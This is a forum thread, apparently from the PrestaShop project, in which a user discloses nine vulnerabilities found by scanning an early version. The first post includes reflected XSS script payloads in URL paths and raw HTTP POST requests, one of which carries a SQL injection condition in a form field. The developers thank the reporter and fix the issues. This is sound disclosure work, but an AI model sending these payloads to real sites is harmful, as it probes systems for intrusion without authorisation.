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9 security issues discovered


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Found this application nice for my needs but after a scan on the frontend, I discovered 9 security holes





- /prestashop/search.php/>"><ScRiPt>alert(1284656107)</ScRiPt>

- /prestashop/order.php/>"><ScRiPt>alert(1847082919)</ScRiPt>

- /prestashop/index.php/>"><ScRiPt>alert(1868783360)</ScRiPt>






6 Blind SQL/XPATH injection (string inputs et numeric inputs)



- /prestashop/delivery.php




POST /TESTS/prestashop/prestashop/delivery.php HTTP/1.0

Accept: */*

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

Host: localhost

Content-Length: 27

Cookie: 2467f97bc4de890653b11ffaf96f091d=HKqwH3T6lgo%3Dapk3T2Ho0LI%3DfZe%2FYlmr7LQ%3DlXqZZx2iFeE%3Dzz7%2FXIVLDtk%3DX54uXNGGQw4%3DYb4oDR0YLso%3DMlxZfZTCSgo%3DH%2Bk8E7Uplmk%3DEMDKE7P03Uc%3DtSn1JzkLvcw%3D;=httponly

Connection: Close

Pragma: no-cache






- /prestashop/modules/cheque/payment.php

(same header)




- /prestashop/history.php

POST /TESTS/prestashop/prestashop/history.php HTTP/1.0

Accept: */*

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

Host: localhost

Content-Length: 23

Cookie: 2467f97bc4de890653b11ffaf96f091d=HKqwH3T6lgo%3Dapk3T2Ho0LI%3DfZe%2FYlmr7LQ%3DlXqZZx2iFeE%3Dzz7%2FXIVLDtk%3DX54uXNGGQw4%3DYb4oDR0YLso%3DMlxZfZTCSgo%3DH%2Bk8E7Uplmk%3DEMDKE7P03Uc%3DtSn1JzkLvcw%3D;=httponly

Connection: Close

Pragma: no-cache






- /prestashop/modules/cheque/payment.php

(same header)




- /prestashop/contact-form.php


POST /TESTS/prestashop/prestashop/contact-form.php HTTP/1.0

Accept: */*

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

Host: localhost

Content-Length: 132

Cookie: 2467f97bc4de890653b11ffaf96f091d=HKqwH3T6lgo%3Dapk3T2Ho0LI%3DfZe%2FYlmr7LQ%3DlXqZZx2iFeE%3Dzz7%2FXIVLDtk%3DX54uXNGGQw4%3DYb4oDR0YLso%3DMlxZfZTCSgo%3DH%2Bk8E7Uplmk%3DEMDKE7P03Uc%3DtSn1JzkLvcw%3D;=httponly

Connection: Close

Pragma: no-cache


id_contact=0&[email protected]"+and+"1"%3D"0&[email protected]&submitMessage=%E5%8F%91%E9%80%81






POST /TESTS/prestashop/prestashop/history.php HTTP/1.0

Accept: */*

Content-Type: application/x-www-form-urlencoded

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322)

Host: localhost

Content-Length: 27

Cookie: 2467f97bc4de890653b11ffaf96f091d=HKqwH3T6lgo%3Dapk3T2Ho0LI%3DfZe%2FYlmr7LQ%3DlXqZZx2iFeE%3Dzz7%2FXIVLDtk%3DX54uXNGGQw4%3DYb4oDR0YLso%3DMlxZfZTCSgo%3DH%2Bk8E7Uplmk%3DEMDKE7P03Uc%3DtSn1JzkLvcw%3D;=httponly

Connection: Close

Pragma: no-cache






All these security issues come from bad input filtering of course.

Good Luck.

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Good point, James.  While we don't want to shut off any method of communication entirely, after v1.0 we should probably emphasize the use of the [email protected] e-mail address while placing revealing forum posts in quarantine until we release a fixed update of the software.


Just FYI, fixing these security holes have delayed release of v0.8.9 by a few hours.  Thank you or your patience. :)

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Actually, i did not see this email adress, and as I said to Bruno on the phone today, I saw this forum category and thought that was the right place for this alert.

But i'll sure use the email next time if there should be a next time. ;)


I'm glad I could help.


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Hi tijuan,


The reason you didn't see that e-mail address ([email protected]) is simple: We hadn't published it anywhere yet.  In fact, we created it after your post. So you did the right thing by posting your security issues here. ;D


Pointing out flaws in our security, delaying our next release, making us create new e-mail addresses ... who invited you here, anyway?  :D


But seriously, please feel free to contribute again.

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